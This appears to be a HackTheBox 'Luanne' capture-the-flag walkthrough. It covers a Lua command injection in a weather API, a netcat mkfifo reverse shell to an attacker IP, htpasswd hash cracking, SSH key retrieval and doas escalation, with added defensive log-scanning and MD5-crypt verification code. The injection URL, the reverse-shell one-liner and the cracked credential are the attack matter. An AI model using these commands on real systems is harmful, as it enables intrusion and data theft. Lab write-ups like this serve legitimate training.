HackTheBox “Luanne” Walkthrough
Luanne is an easy-level Unix (NetBSD) machine on HackTheBox. Starting from the Supervisor Process Manager, I exploited a command injection vulnerability in a Lua-backed weather API on port 80. That shell gave me access to a web server bound to localhost, where an SSH private key was waiting and carried me to the second user. Armed with doas privileges, I decrypted a backup file with netpgp, cracked the password hash it contained, and attained root access.
Let’s get started! 🚀
Recon & Enumeration
Let’s run a full nmap scan for open ports and services:
Check port 80.
Launching a directory scan.
Let’s see what we have inside robots.txt.
Initiate a dirsearch on the directory labeled “weather” found within the Disallow section.
Have a look at /weather/forecast.
The JSON response contains an error message saying that the city is missing. As the message suggests, we appended the city parameter with the value “list” to obtain the complete list of available cities.
Experimenting with the parameter’s value, we appended a quote and a semicolon after “list” and observed the response: a Lua error. The silver lining: the error disclosed both a directory path and a useful error message.
Having broken the query with a quote and a semicolon, we tried several variations of the parameter to turn the error into an injection. After a few iterations we achieved remote command execution through os.execute. Using the closing sequence ') to terminate the interpolated string and call, ; to separate statements, and a trailing Lua comment -- to discard the remainder of the original line sealed off the injection and produced the output together with the warning message.
http://10.10.10.218/weather/forecast?city=list;')os.execute("cat /etc/passwd")--
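From the defender’s side, the same request that gave us a shell leaves a clear trace in the web server’s access log. The following is an added example, not code from the original walkthrough or from the Luanne box: it parses NCSA/combined-format log lines, percent-decodes the city parameter, and flags values that carry Lua syntax fragments or that are not on the API’s published city list. The log lines and the city list are constructed for the example (the real list is whatever city=list returns); the path /weather/forecast and the os.execute sink are taken from the walkthrough.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined/NCSA access-log line, as written by NetBSD httpd or Apache.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed stand-in for the list the API returns for city=list.
KNOWN_CITIES = {"list", "London", "Manchester", "Edinburgh", "Cardiff", "Belfast"}

# Lua syntax fragments that never belong in a city name; these are the
# sequences the walkthrough used to break out of the interpolated string.
LUA_INDICATORS = {
    "os.execute": "Lua shell sink os.execute",
    "')": "string-and-call terminator ')",
    ";": "Lua statement separator ;",
    "--": "Lua line comment --",
}

# Constructed sample log (not captured from the target). Line 3 carries the
# walkthrough's payload percent-encoded; line 4 is the quote-semicolon probe.
SAMPLE_LOG = "\n".join([
    '10.10.14.6 - - [16/Sep/2020:10:01:02 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 512 "-" "curl/7.72.0"',
    '10.10.14.6 - - [16/Sep/2020:10:01:09 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 341 "-" "curl/7.72.0"',
    '10.10.14.6 - - [16/Sep/2020:10:01:31 +0000] "GET /weather/forecast?city=list%3B%27%29os.execute%28%22cat%20/etc/passwd%22%29-- HTTP/1.1" 500 77 "-" "curl/7.72.0"',
    '10.10.14.6 - - [16/Sep/2020:10:02:00 +0000] "GET /weather/forecast?city=list%27%3B HTTP/1.1" 500 64 "-" "curl/7.72.0"',
])


def analyze_line(line):
    """Return a finding dict for a suspicious forecast request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/weather/forecast":
        return None
    # parse_qs percent-decodes, so %27%29 in the log shows up here as ')
    for city in parse_qs(parts.query, keep_blank_values=True).get("city", []):
        indicators = [desc for frag, desc in LUA_INDICATORS.items() if frag in city]
        if city not in KNOWN_CITIES:
            # The strongest check: anything not on the published list is noise
            # at best and an injection attempt at worst.
            indicators.append("value not in published city list")
        if indicators:
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "city": city,
                "indicators": indicators,
            }
    return None


def scan(log_text):
    """Run analyze_line over every line and keep the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['ts']} {finding['ip']} city={finding['city']!r}")
        for ind in finding["indicators"]:
            print("    -", ind)
```

The allowlist check is the one to keep in production: the API itself publishes the set of valid values, so an exact match against that set catches payloads that avoid every token in the indicator table.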
The reverse shell command, which we URL-encode before sending:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f |/bin/sh -i 2>&1| nc 10.10.14.6 4343 >/tmp/f
Launch a listener.
We inject the URL-encoded reverse shell command:
Check our listener.
The command landed and we quickly had a shell on the target. Using ls to look for clues, we found the coveted .htpasswd file.
Let’s read htpasswd.
Discovered the hashed password for the user ‘webapi_user’:
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Let’s crack it using john:
The hash is MD5-crypt, and john recovered it as “iamthebest,” giving us the webapi_user password. Now let’s continue enumerating the target.
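The $1$ prefix on the hash above identifies MD5-crypt, the crypt(3) scheme that htpasswd -m still writes. As an added example (not part of the original walkthrough), here is the algorithm in pure Python so a defender can confirm a recovered credential, or check an .htpasswd entry during an audit, without reaching for john. The only inputs are the hash line the walkthrough found and the password it reports; the helper names are my own.

```python
import hashlib
from hmac import compare_digest

MAGIC = b"$1$"
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)'s base-64 variant: least-significant 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt):
    """MD5-crypt as in FreeBSD/NetBSD crypt(3) and Apache htpasswd -m."""
    pw = password.encode()
    salt = salt.encode()[:8]  # at most 8 salt characters are used
    ctx = hashlib.md5(pw + MAGIC + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    # Mix in one byte of the alternate sum per byte of password.
    for pl in range(len(pw), 0, -16):
        ctx.update(alt[:min(16, pl)])
    # Bit-pattern step: a NUL or the first password byte per bit of len(pw).
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 stretching rounds with the fixed mixing schedule.
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    encoded = b"".join([
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4),
        _to64((f[1] << 16) | (f[7] << 8) | f[13], 4),
        _to64((f[2] << 16) | (f[8] << 8) | f[14], 4),
        _to64((f[3] << 16) | (f[9] << 8) | f[15], 4),
        _to64((f[4] << 16) | (f[10] << 8) | f[5], 4),
        _to64(f[11], 2),
    ])
    return (MAGIC + salt + b"$" + encoded).decode()


def verify(password, hashed):
    """Constant-time comparison of a candidate against a $1$ hash."""
    if not hashed.startswith("$1$"):
        raise ValueError("not an MD5-crypt hash")
    salt = hashed[3:].split("$", 1)[0]
    return compare_digest(md5crypt(password, salt), hashed)


def parse_htpasswd(text):
    """Map user -> hash for each non-empty 'user:hash' line."""
    entries = {}
    for line in text.splitlines():
        if line.strip() and ":" in line:
            user, hashed = line.split(":", 1)
            entries[user.strip()] = hashed.strip()
    return entries


# The .htpasswd line from the walkthrough.
HTPASSWD = "webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0\n"

if __name__ == "__main__":
    for user, hashed in parse_htpasswd(HTPASSWD).items():
        print(user, "matches 'iamthebest':", verify("iamthebest", hashed))
```

Two things worth noticing in the code: the salt is capped at 8 characters, and the work factor is a fixed 1000 rounds, which is why a wordlist run against this format finishes in seconds on commodity hardware and why .htpasswd files should use bcrypt (htpasswd -B) instead.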
I attempted to explore the contents of those directories, but found no accessible information. Now, let’s examine the active processes.
The r.michaels user is running another instance of weather.lua on port 3001. We tried curl to retrieve the local page on port 3001.
That returned a “No Authorization” error for what appeared to be the same page as on port 80, so I tried authenticating as webapi_user.
The site came back and looked identical to the one on port 80. Since the tilde (~) in the URLs indicates a user home directory, and the process runs as r.michaels, we explored whether that home directory was reachable.
Let’s append a forward slash after the ~r.michaels directory.
We got a directory listing. Let’s see if we can retrieve the SSH private key.
$ curl -u webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2610  100  2610    0     0   424k      0 --:--:-- --:--:-- --:--:--  424k
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted]
-----END OPENSSH PRIVATE KEY-----
Let’s ssh into the target using the id_rsa key.
Let’s have a look around.
In the backups directory we found an encrypted backup file named devel_backup-2020-09-16.tar.gz.enc. Using the netpgp command, we decrypted it so we could extract its contents.
Decompress.
Let’s have a look at those directories.
Let’s check .htpasswd.
Let’s crack the hash we found using John.
With the cracked password, we used the doas command to gain superuser privileges.
And we have a root shell.
Cheers.